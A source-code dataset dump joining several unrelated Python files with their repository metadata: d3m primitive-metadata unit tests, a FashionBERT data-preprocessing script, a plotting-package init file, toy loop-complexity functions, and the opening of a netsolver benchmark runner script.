self.assertLogs(logger=logger, level=logging.DEBUG) as cm: logger.debug("Dummy log") metadata_base.PrimitiveMetadata()._validate_namespace_compliance('d3m.primitives.classification.random_forest.SKLearn', metadata_base.PrimitiveFamily.CLASSIFICATION) self.assertEqual(len(cm.records), 1) def test_will_generate_warning_for_missing_contact(self): logger = logging.getLogger(metadata_base.__name__) bad_metadata = metadata_base.PrimitiveMetadata({ 'id': 'id', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'path', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.PRINCIPAL_COMPONENT_ANALYSIS, ], 'primitive_family': metadata_base.PrimitiveFamily.FEATURE_SELECTION, 'installation': [{ 'type': metadata_base.PrimitiveInstallationType.PIP, 'package': 'foobar', 'version': '0.1.0', }], 'source': { 'name': 'Test author', # 'contact': 'mailto:test@example.com', 'uris': 'http://someplace' } }) good_metadata = metadata_base.PrimitiveMetadata({ 'id': 'id', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'path', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.PRINCIPAL_COMPONENT_ANALYSIS, ], 'primitive_family': metadata_base.PrimitiveFamily.FEATURE_SELECTION, 'installation': [{ 'type': metadata_base.PrimitiveInstallationType.PIP, 'package': 'foobar', 'version': '0.1.0', }], 'source': { 'name': 'Test author', 'contact': 'mailto:test@example.com', 'uris': 'http://someplace' } }) # Ensure a warning message is generated for a primitive with no contact specified in the metadata.source with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: metadata_base.PrimitiveMetadata()._validate_contact_information(bad_metadata.query()) self.assertEqual(len(cm.records), 1) self.assertEqual(cm.records[0].msg, "%(python_path)s: Contact information such as the email address of the author (e.g., \"mailto:author@example.com\") should be specified in primitive metadata in its \"source.contact\" field.") # Ensure a warning message is NOT generated for a primitive with a contact specified in the metadata.source with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: logger.debug("Dummy log") metadata_base.PrimitiveMetadata()._validate_contact_information(good_metadata.query()) self.assertEqual(len(cm.records), 1) def test_will_generate_warning_for_empty_contact(self): logger = logging.getLogger(metadata_base.__name__) bad_metadata = metadata_base.PrimitiveMetadata({ 'id': 'id', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'path', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.PRINCIPAL_COMPONENT_ANALYSIS, ], 'primitive_family': metadata_base.PrimitiveFamily.FEATURE_SELECTION, 'installation': [{ 'type': metadata_base.PrimitiveInstallationType.PIP, 'package': 'foobar', 'version': '0.1.0', }], 'source': { 'name': 'Test author', 'contact': '', 'uris': ['http://someplace'] } }) good_metadata = metadata_base.PrimitiveMetadata({ 'id': 'id', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'path', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.PRINCIPAL_COMPONENT_ANALYSIS, ], 'primitive_family': metadata_base.PrimitiveFamily.FEATURE_SELECTION, 'installation': [{ 'type': metadata_base.PrimitiveInstallationType.PIP, 'package': 'foobar', 'version': '0.1.0', }], 'source': { 'name': 'Test author', 'contact': 'mailto:test@example.com', 'uris': ['http://someplace'] } }) # Ensure a warning message is generated for a primitive with empty contact specified in the metadata.source. with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: metadata_base.PrimitiveMetadata()._validate_contact_information(bad_metadata.query()) self.assertEqual(len(cm.records), 1) self.assertEqual(cm.records[0].msg, "%(python_path)s: Contact information such as the email address of the author (e.g., \"mailto:author@example.com\") should be specified in primitive metadata in its \"source.contact\" field.") # Ensure a warning message is NOT generated when a contact value is specified. with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: logger.debug("Dummy log") metadata_base.PrimitiveMetadata()._validate_contact_information(good_metadata.query()) self.assertEqual(len(cm.records), 1) def test_will_not_generate_missing_contact_warning_when_installation_not_specified(self): logger = logging.getLogger(metadata_base.__name__) good_metadata = metadata_base.PrimitiveMetadata({ 'id': 'id', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'path', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.PRINCIPAL_COMPONENT_ANALYSIS, ], 'primitive_family': metadata_base.PrimitiveFamily.FEATURE_SELECTION, 'source': { 'name': 'Test author', 'uris': ['http://someplace'] } }) # Ensure a warning message is NOT generated when a contact value is not specified when installation is also # not specified. with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: logger.debug("Dummy log") metadata_base.PrimitiveMetadata()._validate_contact_information(good_metadata.query()) self.assertEqual(len(cm.records), 1) def test_will_generate_warning_for_missing_uris(self): logger = logging.getLogger(metadata_base.__name__) bad_metadata = metadata_base.PrimitiveMetadata({ 'id': 'id', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'path', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.PRINCIPAL_COMPONENT_ANALYSIS, ], 'primitive_family': metadata_base.PrimitiveFamily.FEATURE_SELECTION, 'installation': [{ 'type': metadata_base.PrimitiveInstallationType.PIP, 'package': 'foobar', 'version': '0.1.0', }], 'source': { 'name': 'Test author', 'contact': 'mailto:test@example.com', } }) good_metadata = metadata_base.PrimitiveMetadata({ 'id': 'id', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'path', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.PRINCIPAL_COMPONENT_ANALYSIS, ], 'primitive_family': metadata_base.PrimitiveFamily.FEATURE_SELECTION, 'installation': [{ 'type': metadata_base.PrimitiveInstallationType.PIP, 'package': 'foobar', 'version': '0.1.0', }], 'source': { 'name': 'Test author', 'contact': 'mailto:test@example.com', 'uris': ['http://someplace'], } }) # Ensure a warning message is generated for a primitive with no uris specified in the metadata.source. with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: metadata_base.PrimitiveMetadata()._validate_contact_information(bad_metadata.query()) self.assertEqual(len(cm.records), 1) self.assertEqual(cm.records[0].msg, "%(python_path)s: A bug reporting URI should be specified in primitive metadata in its \"source.uris\" field.") # Ensure a warning message is NOT generated when uris are specified in the metadata.source. with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: logger.debug("Dummy log") metadata_base.PrimitiveMetadata()._validate_contact_information(good_metadata.query()) self.assertEqual(len(cm.records), 1) def test_will_generate_warning_for_empty_uris(self): logger = logging.getLogger(metadata_base.__name__) bad_metadata = metadata_base.PrimitiveMetadata({ 'id': 'id', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'path', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.PRINCIPAL_COMPONENT_ANALYSIS, ], 'primitive_family': metadata_base.PrimitiveFamily.FEATURE_SELECTION, 'installation': [{ 'type': metadata_base.PrimitiveInstallationType.PIP, 'package': 'foobar', 'version': '0.1.0', }], 'source': { 'name': 'Test author', 'contact': 'mailto:test@example.com', 'uris': [], } }) good_metadata = metadata_base.PrimitiveMetadata({ 'id': 'id', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'path', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.PRINCIPAL_COMPONENT_ANALYSIS, ], 'primitive_family': metadata_base.PrimitiveFamily.FEATURE_SELECTION, 'installation': [{ 'type': metadata_base.PrimitiveInstallationType.PIP, 'package': 'foobar', 'version': '0.1.0', }], 'source': { 'name': 'Test author', 'contact': 'mailto:test@example.com', 'uris': ['http://someplace'], } }) # Ensure a warning message is generated for a primitive with empty uris specified in the metadata.source. with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: metadata_base.PrimitiveMetadata()._validate_contact_information(bad_metadata.query()) self.assertEqual(len(cm.records), 1) self.assertEqual(cm.records[0].msg, "%(python_path)s: A bug reporting URI should be specified in primitive metadata in its \"source.uris\" field.") # Ensure a warning message is NOT generated when non empty uris are specified in the metadata.source. with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: logger.debug("Dummy log") metadata_base.PrimitiveMetadata()._validate_contact_information(good_metadata.query()) self.assertEqual(len(cm.records), 1) def test_validation_will_warn_on_missing_source(self): logger = logging.getLogger(metadata_base.__name__) bad_metadata = metadata_base.PrimitiveMetadata({ 'id': 'id', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'path', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.PRINCIPAL_COMPONENT_ANALYSIS, ], 'primitive_family': metadata_base.PrimitiveFamily.FEATURE_SELECTION, 'installation': [{ 'type': metadata_base.PrimitiveInstallationType.PIP, 'package': 'foobar', 'version': '0.1.0', }], }) good_metadata = metadata_base.PrimitiveMetadata({ 'id': 'id', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'path', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.PRINCIPAL_COMPONENT_ANALYSIS, ], 'primitive_family': metadata_base.PrimitiveFamily.FEATURE_SELECTION, 'installation': [{ 'type': metadata_base.PrimitiveInstallationType.PIP, 'package': 'foobar', 'version': '0.1.0', }], 'source': { 'name': 'Test author', 'contact': 'mailto:test@example.com', 'uris': ['http://someplace'], } }) # Ensure a warning message is generated for a primitive with no source with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: metadata_base.PrimitiveMetadata()._validate_contact_information(bad_metadata.query()) self.assertEqual(len(cm.records), 1) self.assertEqual(cm.records[0].msg, "%(python_path)s: No \"source\" field in the primitive metadata. Metadata should contain contact information and bug reporting URI.") # Ensure a warning message is NOT generated when source is present with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: logger.debug("Dummy log") metadata_base.PrimitiveMetadata()._validate_contact_information(good_metadata.query()) self.assertEqual(len(cm.records), 1) def test_validation_will_warn_on_missing_description(self): logger = logging.getLogger(metadata_base.__name__) bad_metadata = metadata_base.PrimitiveMetadata({ 'id': 'id', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'path', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.PRINCIPAL_COMPONENT_ANALYSIS, ], 'primitive_family': metadata_base.PrimitiveFamily.FEATURE_SELECTION, 'installation': [{ 'type': metadata_base.PrimitiveInstallationType.PIP, 'package': 'foobar', 'version': '0.1.0', }], }) good_metadata = metadata_base.PrimitiveMetadata({ 'id': 'id', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'path', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.PRINCIPAL_COMPONENT_ANALYSIS, ], 'primitive_family': metadata_base.PrimitiveFamily.FEATURE_SELECTION, 'installation': [{ 'type': metadata_base.PrimitiveInstallationType.PIP, 'package': 'foobar', 'version': '0.1.0', }], 'description': 'primitive description' }) # Ensure a warning message is generated for a primitive with no description with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: metadata_base.PrimitiveMetadata()._validate_description(bad_metadata.query()) self.assertEqual(len(cm.records), 1) self.assertEqual(cm.records[0].msg, "%(python_path)s: Primitive is not providing a description through its docstring.") # Ensure a warning message is NOT generated when description is present with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: logger.debug("Dummy log") metadata_base.PrimitiveMetadata()._validate_description(good_metadata.query()) self.assertEqual(len(cm.records), 1) def test_validation_will_warn_on_empty_description(self): logger = logging.getLogger(metadata_base.__name__) bad_metadata = metadata_base.PrimitiveMetadata({ 'id': 'id', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'path', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.PRINCIPAL_COMPONENT_ANALYSIS, ], 'primitive_family': metadata_base.PrimitiveFamily.FEATURE_SELECTION, 'installation': [{ 'type': metadata_base.PrimitiveInstallationType.PIP, 'package': 'foobar', 'version': '0.1.0', }], 'description': '' }) good_metadata = metadata_base.PrimitiveMetadata({ 'id': 'id', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'path', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.PRINCIPAL_COMPONENT_ANALYSIS, ], 'primitive_family': metadata_base.PrimitiveFamily.FEATURE_SELECTION, 'installation': [{ 'type': metadata_base.PrimitiveInstallationType.PIP, 'package': 'foobar', 'version': '0.1.0', }], 'description': 'primitive description' }) # Ensure a warning message is generated for a primitive with no description with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: metadata_base.PrimitiveMetadata()._validate_description(bad_metadata.query()) self.assertEqual(len(cm.records), 1) self.assertEqual(cm.records[0].msg, "%(python_path)s: Primitive is not providing a description through its docstring.") # Ensure a warning message is NOT generated when description is present with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: logger.debug("Dummy log") metadata_base.PrimitiveMetadata()._validate_description(good_metadata.query()) self.assertEqual(len(cm.records), 1) def test_validation_will_warn_on_inherited_description(self): logger = logging.getLogger(metadata_base.__name__) bad_metadata = metadata_base.PrimitiveMetadata({ 'id': 'id', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'path', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.PRINCIPAL_COMPONENT_ANALYSIS, ], 'primitive_family': metadata_base.PrimitiveFamily.FEATURE_SELECTION, 'installation': [{ 'type': metadata_base.PrimitiveInstallationType.PIP, 'package': 'foobar', 'version': '0.1.0', }], 'description': 'A base class for primitives description' }) good_metadata = metadata_base.PrimitiveMetadata({ 'id': 'id', 'version': '0.1.0', 'name': "Test Primitive", 'python_path': 'path', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.PRINCIPAL_COMPONENT_ANALYSIS, ], 'primitive_family': metadata_base.PrimitiveFamily.FEATURE_SELECTION, 'installation': [{ 'type': metadata_base.PrimitiveInstallationType.PIP, 'package': 'foobar', 'version': '0.1.0', }], 'description': 'primitive description' }) # Ensure a warning message is generated for a primitive with no description with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: metadata_base.PrimitiveMetadata()._validate_description(bad_metadata.query()) self.assertEqual(len(cm.records), 1) self.assertEqual(cm.records[0].msg, "%(python_path)s: Primitive is not providing a description through its docstring.") # Ensure a warning message is NOT generated when description is present with self.assertLogs(logger=logger, level=logging.DEBUG) as cm: logger.debug("Dummy log") metadata_base.PrimitiveMetadata()._validate_description(good_metadata.query()) self.assertEqual(len(cm.records), 1) def test_neural_network_mixin(self): class MyNeuralNetworkModuleBase: pass class Params(params.Params): pass class MyNeuralNetworkModule(MyNeuralNetworkModuleBase): pass # Silence any validation warnings. with utils.silence(): class TestPrimitive( base.NeuralNetworkModuleMixin[Inputs, Outputs, Params, Hyperparams, MyNeuralNetworkModuleBase], unsupervised_learning.UnsupervisedLearnerPrimitiveBase[Inputs, Outputs, Params, Hyperparams], ): metadata = metadata_base.PrimitiveMetadata({ 'id': '4164deb6-2418-4c96-9959-3d475dcf9584', 'version': '0.1.0', 'name': "Test neural network module", 'python_path': 'd3m.primitives.layer.super.TestPrimitive', 'algorithm_types': [ metadata_base.PrimitiveAlgorithmType.CONVOLUTIONAL_NEURAL_NETWORK_LAYER, ], 'primitive_family': metadata_base.PrimitiveFamily.LAYER, }) def produce(self, *, inputs: Inputs, timeout: float = None, iterations: int = None) -> base.CallResult[Outputs]: raise exceptions.NotSupportedError def set_training_data(self, *, inputs: Inputs) -> None: raise exceptions.NotSupportedError def fit(self, *, timeout: float = None, iterations: int = None) -> base.CallResult[None]: raise exceptions.NotSupportedError def get_params(self) -> Params: return Params() def set_params(self, *, params: Params) -> None: pass def get_module(self, *, input_module: MyNeuralNetworkModuleBase) -> MyNeuralNetworkModuleBase: return MyNeuralNetworkModule() if __name__ == '__main__': unittest.main()

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0.077966

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0.902673

0.896263

0.893167

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39,189

808

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0.024806

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null

0

1

0

1

0

null

0

7

8aff1c2f812aca25500e245c4f6ad7db6b627f77

13,288

py

Python

scripts/fashion_bert/crowddataProcessing.py

ggxxding/EasyTransfer

18c1a983b242eb46ffa6c3043b7b615024f25815

[ "Apache-2.0" ]

null

scripts/fashion_bert/crowddataProcessing.py

ggxxding/EasyTransfer

18c1a983b242eb46ffa6c3043b7b615024f25815

[ "Apache-2.0" ]

null

scripts/fashion_bert/crowddataProcessing.py

ggxxding/EasyTransfer

18c1a983b242eb46ffa6c3043b7b615024f25815

[ "Apache-2.0" ]

null

# coding=utf-8 import json import numpy as np from transformers.tokenization_bert import BertTokenizer import random tokenizer = BertTokenizer.from_pretrained('bert-base-chinese') jsonlist_train=[] jsonlist_dev=[] jsonlist_eval=[] '''input_features: image_feature:float:131072, image_mask:int:64, masked_patch_positions:int:5, input_ids:int:64, input_mask:int:64, segment_ids:int:64, masked_lm_positions:int:10, masked_lm_ids:int:10, masked_lm_weights:float:10, nx_sent_labels:int:1 ''' #3730 6157 empty #false id 7920 with open('wnqdata.txt','r') as f: for line in f: data = json.loads(line) #{"sentids": [8380], "text": "文本", "image": "4190.png", "split": "train", "label": "false"} #imgs/xxx.png id = int(data['sentids'][0]) print(id) #6704 7542 text = tokenizer.tokenize(data['text']) ids = tokenizer.convert_tokens_to_ids(text) if id<=6704: img_feature = np.load('./imgfeatures/'+str(data['image'])+'.npy') input = np.array(img_feature, dtype=str).tolist() input = ','.join(input) input += '\t' image_mask = np.ones(64, dtype=str).tolist() input += ','.join(image_mask) input += '\t' #msked_patch_positions positions=[] while len(positions)<5: temp = random.randint(1,63) if temp not in positions: positions.append(temp) positions.sort() masked_patch_position = np.array(positions, dtype=str).tolist() input += ','.join(masked_patch_position) input += '\t' #input_ids #text = tokenizer.tokenize(data['text']) #ids = tokenizer.convert_tokens_to_ids(text) if len(ids)>64: len_ids = 64 ids=ids[:64] else: len_ids = len(ids) while(len(ids)!=64): ids.append('0') input_ids = np.array(ids,dtype=str).tolist() ###input += ','.join(input_ids) #input += '\t' #input_mask input_mask = np.ones(len_ids,dtype=str).tolist() while len(input_mask)!=64: input_mask.append('0') ###input += ','.join(input_mask) #input += '\t' #segment_ids segment_ids = np.zeros(64,dtype=int).tolist() for i in range(len(segment_ids)): segment_ids[i]=str(segment_ids[i]) ###input += ','.join(segment_ids) #input += '\t' #print(segment_ids) #print(','.join(segment_ids)) #masked_lm_positions:int:10 positions=[] position_len = round(len_ids*0.15) while len(positions)<position_len: temp = random.randint(1,len_ids-1) if temp not in positions: positions.append(temp) positions.sort() while len(positions)!=10: positions.append(0) masked_lm_positions = np.array(positions, dtype=str).tolist() ###input += ','.join(masked_lm_positions) #input += '\t' #print(','.join(masked_lm_positions)) #masked_lm_ids:int:10,masked_lm_weights:float:10,nx_sent_labels:int:1 masked_lm_ids = [] for i in masked_lm_positions: if len(masked_lm_ids)<position_len: masked_lm_ids.append(str(input_ids[int(i)])) else: masked_lm_ids.append(str(0)) input += ','.join(input_ids) input += '\t' input += ','.join(input_mask) input += '\t' input += ','.join(segment_ids) input += '\t' input += ','.join(masked_lm_positions) input += '\t' input += ','.join(masked_lm_ids) input += '\t' # masked_lm_weights:float:10, masked_lm_weights = np.array(np.ones(10, dtype=float),dtype=str).tolist() for i in range(position_len,10):#range(9,10) -> 9 masked_lm_weights[i] = '0.0' input += ','.join(masked_lm_weights) input += '\t' # nx_sent_labels:int:1 if data['label'] == 'true': input += '1' else: input += '0' jsonlist_train.append(input) elif id>6704 and id<=7542: img_feature = np.load('./imgfeatures/' + str(data['image']) + '.npy') input = np.array(img_feature, dtype=str).tolist() input = ','.join(input) input += '\t' image_mask = np.ones(64, dtype=str).tolist() input += ','.join(image_mask) input += '\t' # msked_patch_positions positions = [] while len(positions) < 5: temp = random.randint(1, 63) if temp not in positions: positions.append(temp) positions.sort() masked_patch_position = np.array(positions, dtype=str).tolist() input += ','.join(masked_patch_position) input += '\t' # input_ids # text = tokenizer.tokenize(data['text']) # ids = tokenizer.convert_tokens_to_ids(text) if len(ids) > 64: len_ids = 64 ids = ids[:64] else: len_ids = len(ids) while (len(ids) != 64): ids.append('0') input_ids = np.array(ids, dtype=str).tolist() ###input += ','.join(input_ids) # input += '\t' # input_mask input_mask = np.ones(len_ids, dtype=str).tolist() while len(input_mask) != 64: input_mask.append('0') ###input += ','.join(input_mask) # input += '\t' # segment_ids segment_ids = np.zeros(64, dtype=int).tolist() for i in range(len(segment_ids)): segment_ids[i] = str(segment_ids[i]) ###input += ','.join(segment_ids) # input += '\t' # print(segment_ids) # print(','.join(segment_ids)) # masked_lm_positions:int:10 positions = [] position_len = round(len_ids * 0.15) while len(positions) < position_len: temp = random.randint(1, len_ids - 1) if temp not in positions: positions.append(temp) positions.sort() while len(positions) != 10: positions.append(0) masked_lm_positions = np.array(positions, dtype=str).tolist() ###input += ','.join(masked_lm_positions) # input += '\t' # print(','.join(masked_lm_positions)) # masked_lm_ids:int:10,masked_lm_weights:float:10,nx_sent_labels:int:1 masked_lm_ids = [] for i in masked_lm_positions: if len(masked_lm_ids) < position_len: masked_lm_ids.append(str(input_ids[int(i)])) else: masked_lm_ids.append(str(0)) input += ','.join(input_ids) input += '\t' input += ','.join(input_mask) input += '\t' input += ','.join(segment_ids) input += '\t' input += ','.join(masked_lm_positions) input += '\t' input += ','.join(masked_lm_ids) input += '\t' # masked_lm_weights:float:10, masked_lm_weights = np.array(np.ones(10, dtype=float), dtype=str).tolist() for i in range(position_len, 10): # range(9,10) -> 9 masked_lm_weights[i] = '0.0' input += ','.join(masked_lm_weights) input += '\t' # nx_sent_labels:int:1 if data['label'] == 'true': input += '1' else: input += '0' jsonlist_dev.append(input) elif id>7542: img_feature = np.load('./imgfeatures/' + str(data['image']) + '.npy') input = np.array(img_feature, dtype=str).tolist() input = ','.join(input) input += '\t' image_mask = np.ones(64, dtype=str).tolist() input += ','.join(image_mask) input += '\t' # msked_patch_positions ''' positions = [] while len(positions) < 5: temp = random.randint(1, 63) if temp not in positions: positions.append(temp) positions.sort() masked_patch_position = np.array(positions, dtype=str).tolist() input += ','.join(masked_patch_position) input += '\t' ''' # input_ids # text = tokenizer.tokenize(data['text']) # ids = tokenizer.convert_tokens_to_ids(text) if len(ids) > 64: len_ids = 64 ids = ids[:64] else: len_ids = len(ids) while (len(ids) != 64): ids.append('0') input_ids = np.array(ids, dtype=str).tolist() ###input += ','.join(input_ids) # input += '\t' # input_mask input_mask = np.ones(len_ids, dtype=str).tolist() while len(input_mask) != 64: input_mask.append('0') ###input += ','.join(input_mask) # input += '\t' # segment_ids segment_ids = np.zeros(64, dtype=int).tolist() for i in range(len(segment_ids)): segment_ids[i] = str(segment_ids[i]) ###input += ','.join(segment_ids) # input += '\t' # print(segment_ids) # print(','.join(segment_ids)) # masked_lm_positions:int:10 positions = [] position_len = round(len_ids * 0.15) while len(positions) < position_len: temp = random.randint(1, len_ids - 1) if temp not in positions: positions.append(temp) positions.sort() while len(positions) != 10: positions.append(0) masked_lm_positions = np.array(positions, dtype=str).tolist() ###input += ','.join(masked_lm_positions) # input += '\t' # print(','.join(masked_lm_positions)) # masked_lm_ids:int:10,masked_lm_weights:float:10,nx_sent_labels:int:1 masked_lm_ids = [] for i in masked_lm_positions: if len(masked_lm_ids) < position_len: masked_lm_ids.append(str(input_ids[int(i)])) else: masked_lm_ids.append(str(0)) input += ','.join(input_ids) input += '\t' input += ','.join(input_mask) input += '\t' input += ','.join(segment_ids) input += '\t' #input += ','.join(masked_lm_positions) #input += '\t' #input += ','.join(masked_lm_ids) #input += '\t' # masked_lm_weights:float:10, #masked_lm_weights = np.array(np.ones(10, dtype=float), dtype=str).tolist() ''' for i in range(position_len, 10): # range(9,10) -> 9 masked_lm_weights[i] = '0.0' input += ','.join(masked_lm_weights) input += '\t' ''' # nx_sent_labels:int:1 if data['label'] == 'true': input += '1' else: input += '0' input += '\t' # prod_desc:str:1, input += '0\t' # text_prod_id:str:1, input += str(id) input += '\t' # image_prod_id:str:1, if data['label'] == 'false': input += str(id - 4190) else: input += str(id) input += '\t' print(id, id - 4190) # prod_img_id:str:1 input += '0' jsonlist_eval.append(input) #print(data) #jsonlist_train = jsonlist_train+jsonlist_dev+jsonlist_eval print('len(train) before: ', len(jsonlist_train)) print('len(dev) before : ', len(jsonlist_dev)) jsonlist_train = jsonlist_train+jsonlist_dev print('8/9*len(jsonlist_train)',8/9*len(jsonlist_train)) random.shuffle(jsonlist_train) #jsonlist_eval=jsonlist_train[int(0.9*len(jsonlist_train)):] jsonlist_dev=jsonlist_train[int(8/9*len(jsonlist_train)):] jsonlist_train=jsonlist_train[:int(8/9*len(jsonlist_train))] print('len(train) after: ',len(jsonlist_train)) print('len(dev) after: ',len(jsonlist_dev)) print('len(eval)',len(jsonlist_eval)) with open('train.list_csv','w') as f: for i in jsonlist_train: f.write(i) f.write('\n') with open('dev.list_csv','w') as f: for i in jsonlist_dev: f.write(i) f.write('\n') with open('eval_txt2img.list_csv','w') as f: for i in jsonlist_eval: f.write(i) f.write('\n')

37.85755

99

0.497742

1,517

13,288

4.158866

0.080422

0.068474

0.0466

0.045174

0.868759

0.846727

0.816611

0.798859

0.786971

0

0.028958

0.360701

13,288

350

100

37.965714

0.713714

0.165187

0

0.822511

0

0.039992

0.004345

0

1

0

false

0

0.017316

0

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0.034632

0

null

0

1

0

1

0

null

0

7

c10edbcc00cd802bd908f06ad27df7e54a797a0a

204

py

Python

pyrate/algorithms/plots/__init__.py

fscutti/pyrate

0e974cdaa43e25cfa1a93de4449e5a39f67b1097

[ "BSD-3-Clause" ]

null

pyrate/algorithms/plots/__init__.py

fscutti/pyrate

0e974cdaa43e25cfa1a93de4449e5a39f67b1097

[ "BSD-3-Clause" ]

null

pyrate/algorithms/plots/__init__.py

fscutti/pyrate

0e974cdaa43e25cfa1a93de4449e5a39f67b1097

[ "BSD-3-Clause" ]

null

from pyrate.algorithms.plots.Make1DHistPlot import Make1DHistPlot from pyrate.algorithms.plots.Make2DHistPlot import Make2DHistPlot from pyrate.algorithms.plots.Make1DProfilePlot import Make1DProfilePlot

51

71

0.897059

21

204

8.714286

0.380952

0.163934

0.327869

0.409836

0

0.03125

0.058824

204

3

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0

1

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true

0

1

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1

0

null

0

1

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1

0

null

0

1

0

1

0

1

0

7

c11487ccd64dbbf8fd7807dbf69b5ffcb53e6ffe

769

py

Python

almetro/algorithms.py

arnour/almetro

7d00b1bb746b49dc9dd464395abdf4fe93f028fe

[ "Apache-2.0" ]

null

almetro/algorithms.py

arnour/almetro

7d00b1bb746b49dc9dd464395abdf4fe93f028fe

[ "Apache-2.0" ]

1

2019-08-21T23:02:49.000Z

almetro/algorithms.py

arnour/almetro

7d00b1bb746b49dc9dd464395abdf4fe93f028fe

[ "Apache-2.0" ]

null

import math def loop_n(instance=[]): n = len(instance) j = 0 for _ in range(n): j += 1 return j def loop_n_quadratic(instance=[]): n = len(instance) j = 0 for _ in range(n): for _ in range(n): j += 1 return j def loop_n_cubic(instance=[]): n = len(instance) j = 0 for _ in range(n): for _ in range(n): for _ in range(n): j += 1 return j def loop_n_log(instance=[]): n = len(instance) log_n = math.ceil(math.log2(n)) j = 0 for _ in range(log_n): j += 1 return j def loop_n_log_n(instance=[]): n = len(instance) log_n = math.ceil(math.log2(n)) j = 0 for _ in range(n * log_n): j += 1 return j

16.361702

35

0.50065

121

769

3

0.157025

0.110193

0.220386

0.212121

0.914601

0.909091

0.862259

0.796143

0

0.024793

0.370611

769

46

36

16.717391

0.725207

0

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0

1

0.138889

false

0

0.027778

0

0.305556

0

null

0

1

0

1

0

null

0

9

c13791a2d2236ccf6c5838733386e48992f9456e

5,515

py

Python

figures/hadoop/netsolver-smt/run_hadoop_vdcmapper_config.py

UBC-NSS/netsolver-aij-2019

0c08fa42f53488ae70ffd8132c74cd67c2c902f3

[ "MIT" ]

2

2020-06-20T04:59:12.000Z

2020-08-24T14:01:45.000Z

figures/hadoop/netsolver-smt/run_hadoop_vdcmapper_config.py

UBC-NSS/netsolver-aij-2019

0c08fa42f53488ae70ffd8132c74cd67c2c902f3

[ "MIT" ]

null

figures/hadoop/netsolver-smt/run_hadoop_vdcmapper_config.py

UBC-NSS/netsolver-aij-2019

0c08fa42f53488ae70ffd8132c74cd67c2c902f3

[ "MIT" ]

null

#!/usr/bin/env python3 import os import itertools import tempfile import subprocess import sys import re os.environ['PYTHONHASHSEED']="1" os.environ['PYTHONPATH'] = os.getcwd()+"/solvers/monosat_py/" if not os.path.exists("timelogs"): os.makedirs("timelogs") #this is the exact configuration used for the ijcai experiments #note that ram is enforced, but storage is not, as described in the paper. command = "runlim -t 3600 -s 80000 python3.6 vdcmapper_dist.py --configured --no-detect-sat --no-ignore-ram --ignore-storage --no-assert_all_physical_edges --no-bitblast-addition --no-intrinsic_edge_constraints --intrinsic_edge_sets --refine_flow --no-remove_flow_cycles --static-flow_caps --tree-addition --use_cover_for_refinement --no-anti-affinity --no-min-cores --no-affinity --no-directed " instance_commands = [" --max-vms=4 --max-cores=8 --max-ram=16 --timelog=timelogs/config_results_vdcmapper_hadoop_us_mid1_4vm ../../../instances/hadoop/hadoop_extra/us-mid1.pn ../../../instances/hadoop/instance_list_hadoop_4vm_rnd.txt", " --max-vms=6 --max-cores=8 --max-ram=16 --timelog=timelogs/config_results_vdcmapper_hadoop_us_mid1_6vm ../../../instances/hadoop/hadoop_extra/us-mid1.pn ../../../instances/hadoop/instance_list_hadoop_6vm_rnd.txt", "--max-vms=8 --max-cores=8 --max-ram=16 --timelog=timelogs/config_results_vdcmapper_hadoop_us_mid1_8vm ../../../instances/hadoop/hadoop_extra/us-mid1.pn ../../../instances/hadoop/instance_list_hadoop_8vm_rnd.txt", " --max-vms=10 --max-cores=8 --max-ram=16 --timelog=timelogs/config_results_vdcmapper_hadoop_us_mid1_10vm ../../../instances/hadoop/hadoop_extra/us-mid1.pn ../../../instances/hadoop/instance_list_hadoop_10vm_rnd.txt", " --max-vms=12 --max-cores=8 --max-ram=16 --timelog=timelogs/config_results_vdcmapper_hadoop_us_mid1_12vm ../../../instances/hadoop/hadoop_extra/us-mid1.pn ../../../instances/hadoop/instance_list_hadoop_12vm_rnd.txt", " --max-vms=4 --max-cores=8 --max-ram=16 --timelog=timelogs/config_results_vdcmapper_hadoop_us_mid2_4vm 